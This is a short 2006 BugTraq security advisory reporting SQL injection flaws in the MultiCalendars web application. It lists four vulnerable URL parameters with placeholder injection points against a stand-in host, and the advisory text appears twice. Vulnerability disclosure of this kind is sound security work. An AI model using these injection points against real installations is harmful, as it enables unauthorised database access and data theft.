BugTraq
Back to list
|
Post reply
MultiCalendars [ multiples injection sql ]
Nov 15 2006 04:43PM
saps audit gmail com
vendor site:http://www.expinion.net/
product:MultiCalendars
bug:injection sql
risk:medium
injection sql (get)
http://site.com/rss_out.asp?ID=1&MODE=1&M='[sql]
http://site.com/rss_out.asp?ID=1&MODE=1&M=10&Y='[sql]
http://site.com/all_calendars.asp?month=11&year=2006&cate='[sql]
http://site.com/all_calendars.asp?month=11&year=2006&cate=&ID=&cTYPE=2&c
alsids='[sql]
laurent gaffié & benjamin mossé
http://s-a-p.ca/
contact: saps.audit (at) gmail (dot) com [email concealed]
[ reply ]
Privacy Statement
Copyright 2010, SecurityFocus
product:MultiCalendars
bug:injection sql
risk:medium
injection sql (get)
http://site.com/rss_out.asp?ID=1&MODE=1&M='[sql]
http://site.com/rss_out.asp?ID=1&MODE=1&M=10&Y='[sql]
http://site.com/all_calendars.asp?month=11&year=2006&cate='[sql]
http://site.com/all_calendars.asp?month=11&year=2006&cate=&ID=&cTYPE=2&c
alsids='[sql]
laurent gaffié & benjamin mossé
http://s-a-p.ca/
contact: saps.audit (at) gmail (dot) com [email concealed]
[ reply ]